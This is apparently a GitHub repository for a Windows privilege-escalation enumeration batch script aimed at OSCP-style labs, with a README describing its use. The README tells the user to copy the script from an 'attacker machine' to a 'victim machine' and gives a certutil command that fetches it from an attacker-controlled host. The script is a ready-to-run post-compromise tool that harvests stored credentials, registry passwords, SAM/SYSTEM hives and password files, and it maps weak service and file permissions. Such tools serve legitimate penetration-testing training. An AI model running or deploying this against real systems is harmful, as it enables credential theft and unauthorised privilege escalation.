├── README.md
└── windowsprivchecker.bat


/README.md:
--------------------------------------------------------------------------------
 1 | # Windows Priv Checker
 2 | A Windows privilege escalation (enumeration) script designed with OSCP labs (i.e. legacy Windows machines without Powershell) in mind. The script represents a conglomeration of various privilege escalation checks, gathered from various sources, all done via native Windows binaries present in almost every version of Windows.
 3 | 
 4 | Note, the batch file also operates on the latest versions of Windows as well. PowerShell is not necessary to achieve proper OS enumeration.
 5 | 
 6 | # Use
 7 | Copy the batch file from your attacker machine to a user writeable directory on the victim machine (typically the current users folder, the "public" user folder, or C:\\Windows\\Temp will be writeable). 
 8 | 
 9 | Also (although the script will run without it), it recommended you copy (an older verison of) accesschk.exe to the same location. It is recommended you use an older version of accesschk.exe as the latest version will not work on some older Windows machines. The archived version here worked well in my experience (thanks, g0tmi1k); https://web.archive.org/web/20080530012252/http://live.sysinternals.com/accesschk.exe
10 | 
11 | There are many ways to copy over files. I found certutil.exe to be the most reliable across Windows editions. For example;
12 | 
13 |     certutil.exe -urlcache -split -f "http://$IP/Powerless.bat" Powerless.bat
14 |     
15 | The script may generate a lot of output. My recommended approach is to go through it sequentially making a list of 'interesting' things to look at, sorting them as you go. Once you've reached the end of the output, go through your list in order of what stuck out the most. 
16 | 
17 | You will do yourself a great disservice if you lean heavily on kernel exploits at the expense of thorough Windows enumeration. Although you may find kernel exploits often in work in the labs, try to find other avenues as well.
18 | 
19 | # Sources
20 | -  http://www.fuzzysecurity.com/tutorials/16.html
21 | -  https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Windows%20-%20Privilege%20Escalation.md
22 | -  https://sushant747.gitbooks.io/total-oscp-guide/privilege_escalation_windows.html
23 | -  https://www.absolomb.com/2018-01-26-Windows-Privilege-Escalation-Guide/
24 | -  https://pentest.blog/windows-privilege-escalation-methods-for-pentesters/
25 | 


--------------------------------------------------------------------------------
/windowsprivchecker.bat:
--------------------------------------------------------------------------------
  1 | @echo off
  2 | set cwd=%cd%
  3 | mode con:cols=160 lines=9999
  4 | cd c:\
  5 | 
  6 | echo ====================
  7 | echo WINDOWS PRIV CHECKER
  8 | echo ====================
  9 | echo.
 10 | 
 11 | 
 12 | 
 13 | echo [*] GETTING BASIC SYSTEM INFO
 14 | echo.
 15 | 
 16 | echo [+] systeminfo (use output with https://github.com/bitsadmin/wesng)
 17 | systeminfo
 18 | echo.
 19 | 
 20 | echo [+] Patch Information
 21 | wmic qfe get Caption,Description,HotFixID,InstalledOn
 22 | echo.
 23 | 
 24 | echo [+] Processor Information
 25 | SET Processor
 26 | echo.
 27 | 
 28 | echo [+] Domain Information
 29 | set user
 30 | echo.
 31 | 
 32 | echo [+] PATH INFORMATION
 33 | echo %path%
 34 | echo.
 35 | 
 36 | 
 37 | 
 38 | echo [*] NETWORK INFORMATION
 39 | echo.
 40 | 
 41 | echo [+] Interfaces
 42 | ipconfig /all
 43 | echo.
 44 | 
 45 | echo [+] Netstat
 46 | netstat -ano
 47 | echo.
 48 | 
 49 | echo [+] FIREWALL
 50 | netsh firewall show state
 51 | netsh firewall show config
 52 | netsh advfirewall firewall dump
 53 | echo.
 54 | 
 55 | echo [+] Route
 56 | route print
 57 | echo.
 58 | 
 59 | echo [+] ARP
 60 | arp -A
 61 | echo.
 62 | 
 63 | 
 64 | 
 65 | echo [*] GETTING FILESYSTEM INFO
 66 | echo.
 67 | 
 68 | echo [+] Enumerating Additional Drives
 69 | for %%i in (a b d e f g h i j k l m n o p q r s t u v w x y z) do @dir %%i: 2>nul
 70 | echo.
 71 | 
 72 | echo [+] Network shares
 73 | echo.
 74 | net share
 75 | echo.
 76 | 
 77 | echo [+] Scheduled Tasks
 78 | schtasks /query /fo LIST /v | findstr "TaskName Author: Run: User:"
 79 | echo.
 80 | 
 81 | 
 82 | 
 83 | echo [*] ENUMERATING USER AND ENVIRONMENTAL INFO...
 84 | echo.
 85 | 
 86 | echo [+] Administrators
 87 | net localgroup administrators
 88 | echo.
 89 | 
 90 | echo [+] Environment
 91 | set
 92 | echo.
 93 | 
 94 | echo [+] All Users / Accounts / Groups
 95 | net users
 96 | net accounts
 97 | net localgroup
 98 | echo.
 99 | 
100 | echo [+] Current User
101 | echo Current User: %username%
102 | whoami /all
103 | echo.
104 | 
105 | 
106 | 
107 | echo [*] ENUMERATING FILE AND DIRECTORY PERMISSIONS / CONTENTS
108 | reg.exe ADD "HKCU\Software\Sysinternals\AccessChk" /v EulaAccepted /t REG_DWORD /d 1 /f
109 | echo.
110 | cd %cwd%
111 | 
112 | echo [+] World Writable Files and Directories
113 | accesschk.exe -uwdqs "Users" "c:\*" /accepteula
114 | accesschk.exe -uwdqs "Authenticated Users" "c:\*" /accepteula
115 | accesschk.exe -uwdqs "Everyone" "c:\*" /accepteula
116 | accesschk.exe -uwqs "Users" * /accepteula
117 | accesschk.exe -uwqs "Authenticated Users" * /accepteula
118 | accesschk.exe -uwqs "Everyone" * /accepteula
119 | cd C:\
120 | echo.
121 | 
122 | echo [+] World Writable Program Files and User Directories (icacls)
123 | icacls "C:\Program Files\*" 2>nul | findstr "(F)" | findstr "Everyone"
124 | icacls "C:\Program Files (x86)\*" 2>nul | findstr "(F)" | findstr "Everyone"
125 | icacls "C:\Program Files\*" 2>nul | findstr "(F)" | findstr "BUILTIN\Users"
126 | icacls "C:\Program Files (x86)\*" 2>nul | findstr "(F)" | findstr "BUILTIN\Users"
127 | icacls "C:\Program Files\*" 2>nul | findstr "(M)" | findstr "Everyone"
128 | icacls "C:\Program Files (x86)\*" 2>nul | findstr "(M)" | findstr "Everyone"
129 | icacls "C:\Program Files\*" 2>nul | findstr "(M)" | findstr "BUILTIN\Users"
130 | icacls "C:\Program Files (x86)\*" 2>nul | findstr "(M)" | findstr "BUILTIN\Users"
131 | icacls "C:\Documents and Settings\*" 2>nul | findstr "(F)" | findstr "Everyone"
132 | icacls "C:\Documents and Settings\*" 2>nul | findstr "(M)" | findstr "Everyone"
133 | icacls "C:\Documents and Settings\*" 2>nul | findstr "(F)" | findstr "BUILTIN\Users"
134 | icacls "C:\Documents and Settings\*" 2>nul | findstr "(M)" | findstr "BUILTIN\Users"
135 | icacls "C:\Users\*" 2>nul | findstr "(F)" | findstr "Everyone"
136 | icacls "C:\Users\*" 2>nul | findstr "(F)" | findstr "BUILTIN\Users"
137 | icacls "C:\Users\*" 2>nul | findstr "(M)" | findstr "Everyone"
138 | icacls "C:\Users\*" 2>nul | findstr "(M)" | findstr "BUILTIN\Users"
139 | icacls "C:\Documents and Settings\*" /T 2>nul | findstr ":F" | findstr "BUILTIN\Users"
140 | icacls "C:\Users\*" /T 2>nul | findstr ":F" | findstr "BUILTIN\Users"
141 | echo.
142 | 
143 | echo [+] World Writable Program Files and User Directories (cacls for older versions of Windows)
144 | cacls "C:\Program Files\*" 2>nul | findstr "(F)" | findstr "Everyone"
145 | cacls "C:\Program Files (x86)\*" 2>nul | findstr "(F)" | findstr "Everyone"
146 | cacls "C:\Program Files\*" 2>nul | findstr "(F)" | findstr "BUILTIN\Users"
147 | cacls "C:\Program Files (x86)\*" 2>nul | findstr "(F)" | findstr "BUILTIN\Users"
148 | cacls "C:\Program Files\*" 2>nul | findstr "(M)" | findstr "Everyone"
149 | cacls "C:\Program Files (x86)\*" 2>nul | findstr "(M)" | findstr "Everyone"
150 | cacls "C:\Program Files\*" 2>nul | findstr "(M)" | findstr "BUILTIN\Users"
151 | cacls "C:\Program Files (x86)\*" 2>nul | findstr "(M)" | findstr "BUILTIN\Users"
152 | cacls "C:\Documents and Settings\*" 2>nul | findstr "(F)" | findstr "Everyone"
153 | cacls "C:\Documents and Settings\*" 2>nul | findstr "(M)" | findstr "Everyone"
154 | cacls "C:\Documents and Settings\*" 2>nul | findstr "(F)" | findstr "BUILTIN\Users"
155 | cacls "C:\Documents and Settings\*" 2>nul | findstr "(M)" | findstr "BUILTIN\Users"
156 | cacls "C:\Users\*" 2>nul | findstr "(F)" | findstr "Everyone"
157 | cacls "C:\Users\*" 2>nul | findstr "(F)" | findstr "BUILTIN\Users"
158 | cacls "C:\Users\*" 2>nul | findstr "(M)" | findstr "Everyone"
159 | cacls "C:\Users\*" 2>nul | findstr "(M)" | findstr "BUILTIN\Users"
160 | cacls "C:\Documents and Settings\*" /T 2>nul | findstr ":F" | findstr "BUILTIN\Users"
161 | cacls "C:\Users\*" /T 2>nul | findstr ":F" | findstr "BUILTIN\Users"
162 | echo.
163 | 
164 | echo [+] Checking if Administrator's directory is accessible
165 | dir "C:\Users\Administrator"
166 | dir "C:\Documents and Settings\Administrator"
167 | echo.
168 | 
169 | echo [+] Contents of User Directories
170 | dir "C:\Users\" /a /b /s 2>nul | findstr /v /i "Favorites\\" | findstr /v /i "AppData\\" | findstr /v /i "Microsoft\\" |  findstr /v /i "Application Data\\"
171 | dir "C:\Documents and Settings\" /a /b /s 2>nul | findstr /v /i "Favorites\\" | findstr /v /i "AppData\\" | findstr /v /i "Microsoft\\" |  findstr /v /i "Application Data\\"
172 | echo.
173 | 
174 | echo [+] Contents of C:\
175 | dir "C:\" /b
176 | echo.
177 | 
178 | echo [+] Contents of C:\Program Files
179 | dir "C:\Program Files" /b
180 | echo.
181 | 
182 | echo [+] Contents of C:\Program Files (x86)
183 | dir "C:\Program Files (x86)" /b
184 | echo.
185 | 
186 | echo [+] Contents of C:\inetpub\
187 | dir /a /b C:\inetpub\
188 | echo.
189 | 
190 | 
191 | 
192 | echo [*] SEARCHING FOR CONFIGURATION AND SENSITIVE FILES
193 | echo.
194 | 
195 | echo [+] Searching for common config files
196 | dir /s /b php.ini httpd.conf httpd-xampp.conf my.ini my.cnf web.config
197 | echo.
198 | 
199 | echo [+] Contents of applicationHost.config
200 | type C:\Windows\System32\inetsrv\config\applicationHost.config 2>nul
201 | echo.
202 | 
203 | echo [+] Searching for unattend / sysprep files
204 | dir /b /s unattended.xml* sysprep.xml* sysprep.inf* unattend.xml*
205 | echo.
206 | 
207 | echo [+] Enumerating stored passwords
208 | cmdkey /list
209 | echo.
210 | 
211 | echo [+] Checking for accessible SAM / SYSTEM files
212 | dir %SYSTEMROOT%\repair\SAM 2>nul
213 | dir %SYSTEMROOT%\System32\config\RegBack\SAM 2>nul
214 | dir %SYSTEMROOT%\System32\config\SAM 2>nul
215 | dir %SYSTEMROOT%\repair\system 2>nul
216 | dir %SYSTEMROOT%\System32\config\SYSTEM 2>nul
217 | dir %SYSTEMROOT%\System32\config\RegBack\system 2>nul
218 | dir /a /b /s SAM.b*
219 | echo.
220 | 
221 | echo [+] Searching for vnc, kdbx, and rdp files
222 | dir /a /s /b *.kdbx *vnc.ini *.rdp
223 | echo.
224 | 
225 | echo [+] Searching for possible password files
226 | dir /s /b *pass* *cred* *vnc* *.config*
227 | echo.
228 | 
229 | echo [+] Searching for files containing passwords
230 | start /b findstr /sim password *.xml *.ini *.txt *.config *.bak 2>nul
231 | echo.
232 | 
233 | 
234 | echo [*] REGISTRY CHECKS
235 | echo.
236 | 
237 | echo [+] Searching registry for passwords
238 | reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon" 2>nul | findstr "DefaultUserName DefaultDomainName DefaultPassword"
239 | reg query HKLM /f password /t REG_SZ /s /k
240 | reg query HKCU /f password /t REG_SZ /s /k
241 | reg query "HKCU\Software\ORL\WinVNC3\Password"
242 | reg query "HKLM\SYSTEM\Current\ControlSet\Services\SNMP"
243 | reg query "HKCU\Software\SimonTatham\PuTTY\Sessions"
244 | echo.
245 | 
246 | echo [+] Checking for AlwaysInstallElevated
247 | reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer\AlwaysInstallElevated
248 | reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer\AlwaysInstallElevated
249 | echo.
250 | 
251 | 
252 | 
253 | echo [*] ENUMERATING PROCESSES AND APPLICATIONS
254 | echo.
255 | 
256 | echo [+] Powershell version check
257 | REG QUERY "HKLM\SOFTWARE\Microsoft\PowerShell\1\PowerShellEngine" /v PowerShellVersion
258 | echo.
259 | 
260 | echo [+] Enumerating startup programs
261 | wmic startup get caption,command
262 | echo.
263 | 
264 | echo [+] Current processes
265 | tasklist /v
266 | echo.
267 | 
268 | echo [+] Current processes with services
269 | tasklist /SVC
270 | echo.
271 | 
272 | echo [+] Searching for Apache / Xampp
273 | dir /s /b apache* xampp*
274 | echo.
275 | 
276 | 
277 | 
278 | echo [*] SERVICE CHECKS
279 | echo.
280 | cd %cwd%
281 | 
282 | echo [+] Finding Unquoted Service Paths
283 | wmic service get name,displayname,pathname,startmode 2>nul |findstr /i "Auto" 2>nul |findstr /i /v "C:\Windows\\" 2>nul |findstr /i /v """
284 | sc query state= all > scoutput.txt
285 | findstr "SERVICE_NAME:" scoutput.txt > Servicenames.txt
286 | FOR /F "tokens=2 delims= " %%i in (Servicenames.txt) DO @echo %%i >> services.txt
287 | FOR /F %%i in (services.txt) DO @sc qc %%i | findstr "BINARY_PATH_NAME" >> path.txt
288 | find /v """" path.txt > unquotedpaths.txt
289 | sort unquotedpaths.txt|findstr /i /v C:\WINDOWS
290 | del /f Servicenames.txt
291 | del /f services.txt
292 | del /f path.txt
293 | del /f scoutput.txt
294 | del /f unquotedpaths.txt
295 | echo.
296 | 
297 | echo [+] Finding services with weak permissions
298 | accesschk.exe -uwcqv "Authenticated Users" * /accepteula
299 | accesschk.exe -uwcqv "Everyone" * /accepteula
300 | accesschk.exe -uwcqv "Users" * /accepteula
301 | echo.
302 | 
303 | echo [+] Finding services with modifiable registry values
304 | accesschk.exe -kvqwsu "Authenticated Users" hklm\system\currentcontrolset\services /accepteula
305 | accesschk.exe -kvqwsu "Users" hklm\system\currentcontrolset\services /accepteula
306 | accesschk.exe -kvqwsu "Everyone" hklm\system\currentcontrolset\services /accepteula
307 | echo.
308 | 
309 | echo [+] Currently running services
310 | net start
311 | echo.
312 | 


--------------------------------------------------------------------------------